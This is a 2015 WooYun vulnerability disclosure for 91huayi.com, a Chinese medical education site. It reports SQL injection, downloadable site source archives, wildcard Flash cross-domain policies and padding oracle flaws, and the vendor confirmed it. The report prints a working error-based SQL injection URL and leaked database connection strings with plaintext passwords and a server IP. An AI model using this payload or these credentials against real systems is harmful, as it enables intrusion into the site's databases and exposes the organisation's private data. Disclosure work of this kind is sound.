当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147517

漏洞标题:91华医多个高危漏洞打包

相关厂商:91huayi.com

漏洞作者: 路人甲

提交时间:2015-10-19 11:33

修复时间:2015-12-03 12:42

公开时间:2015-12-03 12:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

RT

详细说明:

0x01:sql注射

http://oa.91huayi.com/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23


1.png


参考:http://wooyun.org/bugs/wooyun-2010-0116951
0x02:多分站整站系统可被下载包含众多敏感信息,整理如下:
http://cms.91huayi.com/cms.91huayi.com.rar
http://dz.91huayi.com/web.rar
http://passport.91huayi.com/passport.91huayi.com.rar
http://admin.91huayi.com/web.rar

1.jpg


多个数据库信息:

<configuration>
	<appSettings>
		<add key="WebDAL" value="IDAL.SqlServer"/>
	</appSettings>
	<connectionStrings>
  <add name="SqlConnection" connectionString="user id=sa;password=sa123;database=cme;server=test;Connect Timeout=50" />
  <add name="cms_conn0" connectionString="user id=91huayi;password=91huayi999;database=hy_cms;server=219.235.240.232;Connect Timeout=50" />
  <add name="cms_conn1" connectionString="user id=91huayi;password=91huayi999;database=hy_cms;server=219.235.240.232;Connect Timeout=50" />
  <add name="hy_com_conn0" connectionString="user id=91huayi;password=91huayi999;database=hy_com;server=219.235.240.232;Connect Timeout=50" />
  <add name="hy_com_conn1" connectionString="user id=91huayi;password=91huayi999;database=hy_com;server=219.235.240.232;Connect Timeout=50" />
  <add name="cme_conn0" connectionString="user id=91huayi;password=91huayi999;database=cme;server=219.235.240.232;Connect Timeout=50" />
  <add name="cme_conn1" connectionString="user id=91huayi;password=91huayi999;database=cme;server=219.235.240.232;Connect Timeout=50" />
  <add name="yikao_conn0" connectionString="user id=sa;password=sa123;database=yk;server=test;Connect Timeout=50" />
  <add name="yikao_conn1" connectionString="user id=sa;password=sa123;database=yk;server=test;Connect Timeout=50" />
  <add name="cmeConnectionString1" connectionString="Data Source=hkserver;Initial Catalog=cme;Persist Security Info=True;User ID=sa;MultipleActiveResultSets=False;Packet Size=4096;Application Name=&quot;Microsoft SQL Server Management Studio&quot;"
   providerName="System.Data.SqlClient" />
 </connectionStrings>
	<system.web>


其它信息:

<add name="SqlConnection" connectionString="user id=kjpt_131;password=sU3uoFmLTTpdCs21Y4iYv6L1V;database=kjpt_common;server=A01DB03P;Connect Timeout=50"/>

漏洞证明:

0x03:多个分站存在flash跨域(不扩不限于以下站点,点到为止)
http://cme.91huayi.com/crossdomain.xml
http://v.91huayi.com/crossdomain.xml
http://v6.91huayi.com/crossdomain.xml

- <cross-domain-policy>
  <allow-access-from domain="*" /> 
  </cross-domain-policy>


0x04:多个分站存在padding Oracle ,包括不限于:

http://cme.91huayi.com/crossdomain.xml
http://v.91huayi.com/crossdomain.xml
http://v6.91huayi.com/crossdomain.xml

修复方案:

我是来找礼物的!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-19 12:41

厂商回复:

谢谢你的报告!已通知相关部门进行处理。

最新状态:

暂无